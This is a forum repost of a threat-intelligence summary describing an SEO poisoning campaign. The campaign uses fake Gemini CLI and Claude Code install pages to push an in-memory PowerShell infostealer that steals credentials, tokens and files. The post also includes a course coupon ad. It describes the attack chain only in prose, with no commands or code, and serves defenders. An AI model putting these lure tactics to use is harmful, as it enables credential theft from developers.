SEO poisoning campaign leverages Gemini and Claude Code impersonation to deliver infostealer

Executive summary

Introduction to Malware Binary Triage (IMBT) Course

Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.

• Financially motivated eCrime actors will likely continue to expand opportunistic campaigns by impersonating AI platforms. These campaigns generate direct supply chain risk for enterprises, as threat actors target software developer tooling, including AI coding assistants and package managers, to compromise developer workstations.
• In early March 2026, EclecticIQ analysts identified an ongoing infostealer campaign targeting Gemini CLI and Claude Code users. Threat actors use SEO poisoning to surface fake domains above legitimate results, directing victims to attacker-controlled infrastructure that mimics genuine AI agent installation pages.
• The infostealer targets Windows endpoints and executes entirely in memory through PowerShell, harvesting credentials and sensitive data from a wide range of applications before exfiltrating the results in encrypted form to a command-and-control server.
• Beyond credential theft, the malware provides arbitrary remote code execution capability, which financially motivated operators leverage to transition into hands-on-keyboard intrusions against selected victims and execute interactive code within the compromised environment.
• Installations from these impersonated websites result in exfiltration of OAuth tokens, CI/CD credentials, corporate VPN details, and sensitive files, giving adversaries a direct path to initial access into the wider enterprise network.
• This campaign showing that, financially motivated threat actors are capitalizing on widespread enterprise adoption of AI platforms to deliver infostealer malware.
• Despite sustained law enforcement action, including Operation Magnus against RedLine and META in October 2024 and the May 2025 disruption of LummaC2 infrastructure, infostealer deployment against enterprise targets will likely continue to grow in the near term. Low operating costs and persistent demand for stolen credentials in underground markets sustain this trajectory.

Typosquatted domains impersonate Gemini and Claude Code installation

The Gemini CLI impersonation campaign was first publicly identified by independent threat researcher @g0njxa [1], whose initial discovery enabled analysis and infrastructure pivoting documented in this report. The infection chain begins with a Google search by a developer looking for the official Gemini CLI [2] or Claude Code [3] installation page. Threat actors use SEO poisoning to surface a fake domain at the top of search results, above the legitimate source. The victim clicks through, lands on a malicious page visually consistent with a genuine vendor installation guide and is prompted to execute a single command to complete the install.

Article Link: SEO poisoning campaign leverages Gemini and Claude Code impersonation to deliver infostealer

1 post - 1 participant

Read full topic

Malware Analysis, News and Indicators - Latest topics